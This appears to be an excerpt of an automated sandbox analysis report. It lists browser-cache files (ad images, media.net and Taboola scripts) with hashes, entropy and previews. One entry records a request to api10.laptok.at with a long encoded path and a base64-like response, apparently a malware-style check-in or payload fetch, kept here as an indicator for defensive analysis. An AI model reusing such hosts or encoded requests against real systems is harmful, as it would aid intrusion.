Preview:	......JFIF.............C....................................................................C.......................................................................,.,.."...........................................I...........................!...1."AQ.#2a.q..B..$3Rb.....%Cr..&4S....5D....................................A.........................!1.A."Qa..q2......#B...R..$3b...Sr4E.T............?.........I..U.a...F..S..d....i.6E....{..i.TUDk........x....'%8..1Pm..?X..ET..[..r....h.......TH....9.{H...s...Wj7\|..e...g...$$..B.X.}......g#....v....=..~8.0Ic.=YQ..V.F.z1....../...5#..2+.#.NN......'.5.>.^7.3.."..}[g...F.W+.....3n.9.D.......s...+...!l.<e..Sm..r...#...xT]UAT...bv...m.......p(W....$...6.N..h....m.....{..D..3.N.#_..U.._..v....i.X^5,..1"9.E..Y.EV..#...j..F......SL......C../+.ED^.E.O.{....\|..&...N.n...>..\|.6.L...V.{X\..6..{.......W~.N.u......[..=...TUD..'}/.o....._)..-......^.r..F.._...uz...CvF.z.u1.r9....TN..U.....$.P..F.4$\.F...k....C

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\adb3478e-c94c-4cdb-9882-fa384ccec861[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
Category:	downloaded
Size (bytes):	86424
Entropy (8bit):	7.979519378625907
Encrypted:	false
SSDEEP:	1536:oXVk5kODvwkyh626qFydrCrE8rxd5mvXlz3QqlAXoX+wkrRsZtAVl:oXVk5hYkyhtzFy3O5WlrDlAw+FEAVl
MD5:	D3CFBC30017E38E6EEEBADEDFD8A3503
SHA1:	A9E354219DB237A4C0632B203C2260DDB977F5F1
SHA-256:	2F3719AD8F485C5B7244E36693E03A942EA6AAC5B0F17E88718881C3F480D64A
SHA-512:	6C74FE3FF4301C78C29119FF0BCCD19893003236C1DDBA229292F181C3CD6017AD23C72FA57F56B4C6800EB0004896AA3319117426378BBD95A45955736F95D6
Malicious:	false
IE Cache URL:	https://cvision.media.net/new/300x300/3/178/41/161/adb3478e-c94c-4cdb-9882-fa384ccec861.jpg?v=9
Preview:	......JFIF.............C....................................................................C.......................................................................,.,.."...........................................B.............................!."1.#A.2Q.$a3B.q.%4R....Cr....&S....................................A.........................!..."1.A#2Qa..q.$3BR......C...%ESbc...............?...=..Q%..c.....%<\|....1....U/.._........_#...\|......s....T0..J....D......D@.....%H...s a.].?0q0233<...G..q...w."......a....<{..NBEl.9d....f.Fc....?....7EWRj.b..u.O.....=..\|wq=..??....}.r.\..[PO...... .'......f.k.f....3.e.8........&9..._.._m.....K.\|........i.K..b.J\|.)..c..........b#.......\\|..?.._3?l..........<X..v8.aL6.].........8....._p!K...q1 P>NFf#......................~....x..r4.......xbNNV...{.O.{.....8....li.l.....DfR.T2yi.\|}.......33..}G..u.>.'.ri[hT..G.kX..\@..wp-..8.............J......r.%.1>......c..Y.Y.....<.._.......\|k...E.A'.m.k_.......j.8[..E.......!.g...~>~fb}-.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	20808
Entropy (8bit):	5.301467861497523
Encrypted:	false
SSDEEP:	384:2MjAGcVXlblcqnzleZSug2f5vzBgF3OZO4QWwY4RXrqt:p86qhbz2RmF3Os4QWwY4RXrqt
MD5:	73455F3084C7DE1D4CCBA2D73F6CBA70
SHA1:	E12E181AFD2F73C896957919C3D0DF4254DDCC7B
SHA-256:	8050E2D5597F872F3514B304C42E0A378F6B54060A2CA93A83D726250D65125A
SHA-512:	78A2A14326FFE60D50E3F0EED2D3C9A6F109185C8A943C075A8953C3E7C22BDB48736DE1F832F0AA85FC29B083AD1CF5613E5FE841309FA5234E58BBBA980467
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":74,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\dA0aOC4[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	340064
Entropy (8bit):	5.999861206284018
Encrypted:	false
SSDEEP:	6144:JIRX8egUYt9OT0ijXuuBm3l5KQo9uUCFhYK7pdFT2DYdwYc08SsVH:JIh5gnwT04Dm3PG9unF6GX4DGq6sJ
MD5:	10FBC9D242FD8CD959FF426E4B62FBE6
SHA1:	72B6C613DCB5A501AA0F7AE15F3BD78627197C9B
SHA-256:	EC909CEE0478B6ED5C79D68B6DDD8CC80B5B707E5F74421980A475812BCBF069
SHA-512:	0CEC539006C6997E80436BA6090B3D0926DCD1031BF761482685E8A9B2C718C29B14A41EAF3EBEA40E1BD2F0945A384FDFE2460334316E05DD52812D9EEA2306
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/zu_2FE7OgtG1YElZCJHzk/3Z6oZ2v_2FSvhdpl/3dtqOsJj6Y7KZxP/RohYJ_2FHTGS4WhMsK/QG5B0lq_2/BpfIpB91VJE6CEmZQm7M/PQN4vdDkebJ_2BGxKNI/VsKdR_2FzTa6vjFIkSkAZy/r8dnnf58olJ6u/p6WgAtg_/2FXj_2Baw19poatwg_2F2kO/3f5_2FyJS3/nBZ6Nmhf_2FEUX1qE/XHrQlN8gAX37/PR_2Fy_2B_2/BhmNEXvGPQ5mPx/Z35_2F9v0RKzbUs6X6gjG/o6gCLElU7pE_2Bpx/oRgBOdZRxgLD0_2/BNQ4L9i8wZtjCkBFgV/vbRDZhUKm/0qlCcD5z2Gyxth4kqVNJ/dA0aOC4
Preview:	Jqhw2IavH8gZkhpcFrw1OLJBaU3JjzLdiA1RGDIRYDgU07YCjPuaB/bxTrBsjXh3SRTqeWes0lsYe+xeTCZoewfQSITdInGuCSyC+BM8izF19niprBwDmtq9Dpq43wqO5mT5wSWfZVgh9/vOjtuke72F3X2y8PNEshnUZSnVHXxlBWcSP59gSAEOiKj1eIPaPdFm9ThzRWlP0N3Y+nFSrJpbBs9Rfw9ueBfOTBZs15IZYX+RrdNFAqlh1x4wRa7jloacgXHC77xIO2TK+ofYKa9o10L+mWzxctg8rOl0KwmZkvzjdI+3eu+0jgqftO6jVPsBoDwxGUjwt3ofq5eee/X+q41KwH9afWCt0m0CidoYvIGIFgMGfhYniRSNgSJf92cZ55KKq15fO7CdupMB1IeiXcUeP39vl7vl1a4vQMe/gDQdZoZci9hbDWipAuGKFxx3rYxAep8hqVlV+KUBfn3XWKRfXcs/P0gZWLFQoJ9ah/TMBHOyVX70/kHv39iAiGg42udHX7tergSmifF4pSQ3LGSwniWbo78VCa7OTTIcGpCq6ZNjG751UcISxcWrGVZY6FCtVfWTqfZPbuZUOHV0RmTgyxfrnDDFTgPtyWuzAWK9aqPVqX+GDynkmmHTOT8ri9BhqfCssEc3JeyONyy9I6RvTtYRoTC8eeWUGuU4bRWF03LPUc/w/ttQgFpwg2EvkRRaLpu/V2P6PiLsROsGcDgMsNH+Dc2HpUMbGLtbA5+j3t9EmwpsbXGYD3MJBmRbXtkSdotAC9p2195oBKIBHFOJbgIIpD3eZES5HiGYNddREUByxgzNQEATb2HXAFpy0cOgBa4PjnqtQj1d9jSuzyviZM0yeFvLWTPHSjzw5Izr3vHCy11LpnyMzQmRLbyKsE7l5KqxjhRpe9OQ+JIAWsFFoYgYkVET6DSoRm8XWqkblYTlky5l1/1foE4WcWQmOt+hUWGLAY3bTgxd1+TQLKY8UPjIdJ8ZkWSk

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\fcmain[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	37858
Entropy (8bit):	5.078135233541778
Encrypted:	false
SSDEEP:	768:01av44u3hPPoW94hZEtCSA1PkpYXf9wOBEZn3SQN3GFl295oolEf/wl6sA:EQ44uRYWmhWIZPkpYXf9wOBEZn3SQN3w
MD5:	1151BB7A9C3965AF026D4E366E1A6E10
SHA1:	AE6FEE052DB18C0BB36C90B6207C58DCBCB799E1
SHA-256:	38571CFDD9BB56C640A6B01B8CAA0ED46E6249F2B3BF0AC89FD54CB97C2D073C
SHA-512:	BE7593D42E99DA1896C8C8140278B7B7D5BEC2F28273AF637E26B775F384BA9DDA44A0E401212C68FE5822CBC348AF524EF54BC432DE5DA675D5B15A3E1CB757
Malicious:	false
IE Cache URL:	https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1611686653747454981&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
Preview:	;window._mNDetails.initAd({"vi":"1611686653747454981","s":{"_mNL2":{"size":"306x271","viComp":"1611685423736335499","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2886934591","l2ac":""},"_mNe":{"pid":"8PO8WH2OT","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=858412214#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"858412214\",\"1611686653747454981\")) \|\| (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_06326605864354eef8d69459f54ecc0c[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	14949
Entropy (8bit):	7.863128761513647
Encrypted:	false
SSDEEP:	384:BYNg7sHt+POQR5J1yEEpn8jbHsUIor4d57wvuBlD:BYyoWhD1yh8jLs0cL7wvuBlD
MD5:	4CCD5894127614E408DEB8BDBF0051B9
SHA1:	B8F3DF4C91750EFE08A455A9733EF77633B09359
SHA-256:	DEAAE85FE55DD154DFEE16A701623B4FA7E5619C1C09B87EAC3EF9FDABCD9038
SHA-512:	9F1DA6AEADF58A0E5D30B787BBC1BCBCC2D57A6ECFEDD6F87BB2B89C57F6B563D29ACC917DC9292234E3C46A4CE8123CCCD600FD4A641251980BEB22A33EC01D
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_485%2Cy_402/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F06326605864354eef8d69459f54ecc0c.jpg
Preview:	......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_29548775a473a2c67add94fd55354025[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	25412
Entropy (8bit):	7.978955001316793
Encrypted:	false
SSDEEP:	768:UL5KG0yD6Hspb63cNHn/shXTbHzhBCs50PekmrfvKr:UL5oKkib6an/YnTCs3kSC
MD5:	C7B0CF3FD64312888F4783ED2FE4B589
SHA1:	59A8235A5B2B7123123F1EBB598FF616CF842742
SHA-256:	8D1B0C4F3830719A588E0A54E4A84692C3584A634A125998E3647E50CC5763AF
SHA-512:	EFEA257EB0671535E932F9DDDEB74976993FA105D1D7162A91BDBF88EECD25F7713FCBDBC8AE6B153C0500D069A7FF660DF986980BB8E87B333F674F5C3E0D8F
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F29548775a473a2c67add94fd55354025.jpg
Preview:	......JFIF.....................................................................&""&0-0>>T......................$.....$6"(""("60:/,/:0VD<<DVdTOTdylly............7...............6..................................................................cZ.../...8~.........C!....a.4...L......... ..1..!..x...@B8..G..5...f....Q.....@L..<.. a.dF.`d.......f.x..F..x<. L...#!...2.g.6...h..vx.`@.4Y.S.<.. )`f.a..e.a.J0....3...ww....c.....(..FC..1.f..c..Z..p.=^a#...(....,.w.`).....#.`H`<3D...}V...u8.......W..T.'7.......o.p...........f.pD...hW;../.......Km...S...k..w.0..`.k..@.3.E.^.i.b.\|V.O..4..L...0hq.U.).ih{.,...]... ....!.d<.0....SQ.......J.....{.z<.o^f....G[.e..l...{Q.V..w`Xd....`...98...U........^.XK.'v....I.L..>...sV...z..2....)....U....\|.~..I...TMS..S.%.h...{./.9.L.0..j]..p...9k..q..T^...V1...g.6.*#..e\..zhb.~.\:.l....)J.....".t.P".85...k.4%j.....f,..8.....l...e..+.DO...iK.J.........if.....d.z.zeM..Js.....=...W.I..4.9u.\.Kd..}5Fb...K.7....c..Xr.S. .j.....Y

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_7b70df30498d02146a2524fb6a92a25e[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	25944
Entropy (8bit):	7.955281592220118
Encrypted:	false
SSDEEP:	384:eeCY3/d9nlzmw36wzCvHsw8KDfmNw7xPVIapjIxYWG47RYu7hog:ZCW3Mw3zz8sj8+NPwjIxYyT+g
MD5:	0CC2FD8A6053381AA789B189275E2262
SHA1:	41E1A824AA743DD2D69009172B5363A9E05A0822
SHA-256:	5917A3FDA3D0A0DD87EB485847D742FDBF8587471A3B2CF6C529D9D213EA39F2
SHA-512:	E1F12806B2FDC00835E3168E93BDE9C6B5A6694E804CB848842ED611AC3C7217E963F8336F0CCFE79F1A0B98E607F3C063A8C444D1D97F8007F322E5A136685F
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F7b70df30498d02146a2524fb6a92a25e.jpg
Preview:	......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...\|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....\|.i.}...0..................................................&....&,%#%,5//5C?CWWu......................'.....'<%+%%+%<5@404@5_JBBJ_m\W\m.vv.............7...............5..................................................................k. .&.C......=G `...v....v....=.C......o5..).........a......z..@.(.1`.>.tI3....-.+&d..=...b.b..p..4x....3..=.C.!..n....H.bv....Qn.>.....a.t....2A...." .4?.t...(i....m.......p.d.%.Y..\|....9&.d.G.h.....`..e.-5

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_8e6ab93656458bf8c68a4c551f4dc3fe[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	22471
Entropy (8bit):	7.979258288189648
Encrypted:	false
SSDEEP:	384:wWXW6bne9c0RzV8N4FWBy1xr81D3PlZaKFbs/43DbzRBHpI4MIbz2YZoyfx7B/hn:dX5K9piN4FWB2EDN0us/43PdPHMmhxdP
MD5:	9AC6B582E43B01C9FFCF8B3E27932589
SHA1:	88EC572FD8EC345C1F9E85CA0FA020B38448267B
SHA-256:	AE79D1B04100620CE96BBA86FD30A32971967EFBFD1125A23AE6A8AE8D788BF2
SHA-512:	A5EA6FCD1A9FA9F5D8F47623C6AEF1C7D03EE00B58B7D66AE6C165403781D93DE6299E2BB951C6F070DA701818C4838BBCD4C4DA4B5E6109C5B3B57F93E80F77
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F8e6ab93656458bf8c68a4c551f4dc3fe.jpg
Preview:	......JFIF.....................................................................&""&0-0>>T......................$.....$6"(""("60:/,/:0VD<<DVdTOTdylly............7...............5..................................................................>....HvS..N.rW..8zW..3G)..=e..dK.......a.C.c.....jF...Wy...k5..pA........8...`.B.4.Q._.(..A....Ja.JC.Ja..( ".....HQe ..N.T(qTS...A.j..!E.p(P...9H5Q.0Q...j..0P..U!`.U. ....\..R..vk.0..0QE.\...U.....A..s..T!.pqpj.L.S..p5h..A...i.0.B.P.D..R.~W..FhQ.6......z..o=U....m...........A..Q.......\|^..^k\|..k..m.......:...b...X.,....x.cv>5..9s......G..<}...x.N=.]\|.....5......s..o..B.,.W.#.q]x..rD-c..M..B..r..V.w.siq.u..Mb...c.....m.=...<...S..z+...G.H%U..+;......g,.j..}.hY....\|.....j...p.[,........{/...Y.....^V.>..0t....n:..T.7'.N.:....p..g.).t_.-.....\|...m..'...F..<.....g{K=...^'\|...}....4.>..W.......9.N......nx....w.......0.l.iW.>.G>....y...%....y....:C..S........j.F.,...Y."..g.....=>.....%..4....\|......W..j....\|

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_9de64e087342a200ccd3882b3b32d7d2[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	18774
Entropy (8bit):	7.96751334833658
Encrypted:	false
SSDEEP:	384:Ul8EDZnIUedTMSU6cDtiwxFWWvoBInw40OuRkczFME2dTUs1lQuqR1ucqQvKDc:V+IUATMS5kptw+wXhznSkuk1QY
MD5:	05B4A297E73C337674A3C8D3B7AA82C7
SHA1:	25AABF7D59469C66D8516E8B64A9626A33F7B78C
SHA-256:	53846C7722CD41AF0D326E996C2BC72E7778DFFF2D08B6946BAF93DF327D170B
SHA-512:	6474E84A47C4948BE87F678A9A63762CAAA6F76A10966D8CEE6216DFE258740431891AF2D7492E114197FCA6D4D344EB7EF5E3A2E1A5A92EDA16D0132480C6C8
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F9de64e087342a200ccd3882b3b32d7d2.jpg
Preview:	......JFIF.....................................................................&""&0-0>>T......................$.....$6"(""("60:/,/:0VD<<DVdTOTdylly............7...............4................................................................O..F.6.A.B..0............+...1. ..0..1AQAAQAQaAaR.0...A..A.(...........]...a..... ..E....E......A..A..a.l1AAQQQAAAQhT....Z..w\.v....t.D..5.5....eRW.eAQQB....../...9.\...Lm.7..Z..Y.k5.V..,]W=..K...B.....v..7>..=K..9..}1..>....YLN...R..%....c.Vm....H.d.0...#.4.~.l..r....eJ.d~..T..W.n.TF.p....A.ZvYij.~f.5..h.ni...(..V..Q:....1.J...[.j..(.e...G...i._nc].V..S6d.]K.7.0.Be..3...zW..d.u..YXn...IQ......,...Y. ...H)e..3^...{>....G...l.....X%c:..r.J....c..y.Y..zv,.....C.J..Ip.C).h+.f.....w,....dpa.A,....Z.W+'eq..c......0.T.TP...R.V...E..)..[.WS.[VZsY.......8.....q....../...w,.)..Tk<..T..&.....M.Ch.JC.9.."t..`....^k<..N[#.]."$}...P3pb..1W."&.F..WQ...%.Ca>........h...Q@0./(.K.=..+.f"..Z...(CIr....E.v.'!...H..Vr..U.W..$

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_aff6bfc1c6c4f2caccde3859baf539e3[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	12437
Entropy (8bit):	7.94903071451543
Encrypted:	false
SSDEEP:	384://qOY9l+/oCOraPqkdaMvusAHN8A32xE+w7Nk4xu:nLYGwCRqlDs0N8Ame+Iu
MD5:	C714712584AA27AB5D14D646823373E9
SHA1:	2633898CDEC8A363D1AAE600D4F841D4C4E6693F
SHA-256:	B3BF62BA5E352A3C8EA2E265903AE2CCB18806F73622B83C377E2B254CE004D1
SHA-512:	CCF2F64C68F32C4D48C2DCB851C6243F0B0336533851EE8CE304F90B9D29EB9092F5DC12D0052E9E9C41BA1BF0C38E8F8156EC14A6A6E9D627B2DB15E4D5D17F
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faff6bfc1c6c4f2caccde3859baf539e3.jpg
Preview:	......JFIF.............C....................................!$..( ..%2%(,-/0/.#484.7./....C.......'..'S7/7SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS......7......................................................................................Db.4y .3..4p.Q.I.....4...A.<8i.... .....xh.....(.!...xh..4a1)....<8a.B!......8.i I....'.H)..F..DF .D#.(X......Lx,..."..!.D4`....q..8A!0...'.)..P Ppr!...8.`.........b.<f.T...F0....A..I....+......h.3.h)Z....4..@.p..piJi..L..[.KP2.......!&<<(((......"3.!..k1..k.Qj...`R...q.0I!n}"^..cH\...a.F...{.].9..Fg..r..%,@...Ate...4....+...nf.c..e`......3F........<Jx.1T.....dM.."......k.tm..f.9...D...W..c.q5..d..y.(..ydl.2m..f..J.Lx...R(...,.m1e..)Jb..../..j..g..@F.(P..8.r...}./.,..E1C5...B.\..;.:@.ICO....4..k....w.0.......2\........O..1.>.3.B&.....0.+.../..?X..R<DR.e4........^]..fwQMQh4,..R..D.g....;f.t.e..JL...\.F....o...&.7..P6....8@"..SKZi.o...Zs...8..:a...E.G....K.bv..N.0 ..3.{.....g)..V.V.R.. >....\*v.-..\..A`.+

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\http___cdn.taboola.com_libtrc_static_thumbnails_b4ca77dbdddcdc3d5aeaaab8225e9263[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	20944
Entropy (8bit):	7.97616967903083
Encrypted:	false
SSDEEP:	384:rDWcJ7b1GWf09eeVuLsqkcJ5ipQZzV3L/j2WKZWGV972urAzntVVju:ricFbtf09e6QssJ4pQZzV3GWKh2eqVBu
MD5:	4A9D3484D588364E0D35F3B57A56A197
SHA1:	6A21AC574C361529CBFC305A8E57285986888A84
SHA-256:	A1E87428AAA46C69760C31ECD6AA8530D9EB85BF1B6073AA790397C5E5A510FF
SHA-512:	9BE976CE1EA26E0F561148118EB4F7615A168EAFFC0193D3B9D43C2ABB145E47BD925B233BBA6F8C842892D1443B0C0097E922FFC2E2E63A69DE1492ABFCC158
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb4ca77dbdddcdc3d5aeaaab8225e9263.png
Preview:	......JFIF.....................................................................&""&0-0>>T............................."......".$...$.6&&6>424>LDDL_Z_\|\|.......7...............7....................................................................>?.+;..{.ge.p;,..e.......v......`.....i.M..c..j..v^.Y..2...c,.....w]...y...B..`...O"f...q\|!->.....6.d..k.g`X.;...u.v...`;...`<....i.0.F.....LX......z.....e.u........u.D..`...R.y..R....PP.. .[..o.........v].w`;....v..ZB..a....a4..\|kAAAAR......5....J....]...v......a3....`...s=....PPPPQ.[..g.FhXY......h.J.Y.dRkZQI...W..~..N.lv.\|i.K1.Tuj...h...j....Pa....H...p.X.@...u......\|..4..2.~&.x..gi..m6..y.!..H1...8a. L...`.`.Y.....-...sv.7$..-..:~7,......FN.O_.....R.b......`.,.....L.9..).....l...\|y.\|.c...>~.hn..6[..l.X.p./.+....`....d,.S.i%J.Xuo..7.u.C./..C..{.......m.....NV...'...R....h.bJ.P3!.;.B"...RR.~..}..Gc....iy.}....e.d._..#.]L..3B=..D...........pp=.f..%..?p7_=4..6Z.C..y$........._3..l..IE.Y<K05.....R......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\https___cdn.hoergeraete.hoeren-heute.ch_signia_article_img_EU-double_off-horizon-d[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	9685
Entropy (8bit):	7.953624988352494
Encrypted:	false
SSDEEP:	192:6dOtYhuVojN+hZLZezca1710eGLj7OS+Wu5vYAqGar6gH1ymP8145j55S64E3kwP:6aYhuVm+PN8B4ipPvyG6T04NS6l3/P
MD5:	F1B7F62A65EFC3560027B5B581E0D8A2
SHA1:	851DEDC1F1D21459DDE3B803404A97ECB8E84899
SHA-256:	F1613263990A9046E457C9D5EFA9E9FC4A86A8C80B382F3EEB2216966552E76B
SHA-512:	F1F4D7E237DEF5E8A809C463CF879C6C4B04FE5C6D1920DFA3A4394DDF9BBC6D70D73E19A8CBF588737BE538A3D082DFF553B8E7335BBEF48C5FE5A9B73CB4B1
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fcdn.hoergeraete.hoeren-heute.ch%2Fsignia_article%2Fimg%2FEU-double_off-horizon-d.jpg
